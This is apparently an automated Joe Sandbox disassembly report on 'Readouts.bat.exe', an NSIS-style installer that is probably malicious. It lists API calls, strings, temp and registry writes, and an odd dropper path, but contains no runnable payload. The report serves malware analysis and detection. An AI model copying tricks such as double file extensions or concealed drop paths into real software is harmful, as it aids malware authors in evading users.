C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
Inst, xrefs: 00402FC2
Error launching installer, xrefs: 00402F2D
C:\Users\user\Desktop\Readouts.bat.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Readouts.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-360671871
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000), ref: 004063FA
SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000), ref: 00406436
SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000), ref: 004064CD

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7
Call, xrefs: 004062D0, 004063AB, 004063B2, 004063B6, 004063D0, 004063D1, 004063E6, 004063F9, 00406415, 00406440, 00406474, 0040647A, 00406496, 004064A9, 004064C6, 004064CC, 004064D8, 0040650B
Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll, xrefs: 004062CB

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3912521887
Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,?,00000031), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

C:\Users\user\AppData\Local\Temp\nsrC488.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsrC488.tmp$C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon$Call
API String ID: 1941528284-1670427631
Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll), ref: 00405359
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll, xrefs: 0040530D, 0040531D, 00405323, 00405346, 00405352

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll
API String ID: 2531174081-1209694238
Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
wsprintfW.USER32 ref: 00406640
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Strings

%s%S.dll, xrefs: 0040663A
\, xrefs: 00406616
UXTHEME, xrefs: 004065F7

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
GetLastError.KERNEL32 ref: 00405812
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
GetLastError.KERNEL32 ref: 00405831

Strings

C:\Users\user\Desktop, xrefs: 004057BB

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-224404859
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DC7
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Readouts.bat.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3), ref: 00405DE2

Strings

"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00405DA9
nsa, xrefs: 00405DB6
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-262050586
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

Function 6FBF177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6FBF1B63: GlobalFree.KERNEL32(?), ref: 6FBF1DB6
Part of subcall function 6FBF1B63: GlobalFree.KERNEL32(?), ref: 6FBF1DBB
Part of subcall function 6FBF1B63: GlobalFree.KERNEL32(?), ref: 6FBF1DC0

GlobalFree.KERNEL32(00000000), ref: 6FBF1829
FreeLibrary.KERNEL32(?), ref: 6FBF18AF
GlobalFree.KERNEL32(00000000), ref: 6FBF18D4

Part of subcall function 6FBF2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBF2387

Part of subcall function 6FBF2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBF17FA,00000000), ref: 6FBF27F8

Part of subcall function 6FBF15C6: lstrcpyW.KERNEL32(?,6FBF4020,00000000,6FBF15C3,?,00000000,6FBF1753,00000000), ref: 6FBF15DC

Strings

, xrefs: 6FBF18B5

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 19e63b3d252064c5ea0e6219942976f3cd2c3c84ea4f22a3e2c8faf293d1498a
Instruction ID: 900222c91ad3fe5d4fc988c685d9a599b02280d29df2805415d04fcf10bda6ea
Opcode Fuzzy Hash: 19e63b3d252064c5ea0e6219942976f3cd2c3c84ea4f22a3e2c8faf293d1498a
Instruction Fuzzy Hash: F941B2F14123C49ADF009F74FA84BCA37A8FF01325F084966E9199A0C6DB78908FCB60

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrC488.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrC488.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrC488.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsrC488.tmp, xrefs: 00402420, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrC488.tmp
API String ID: 2655323295-71659109
Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE

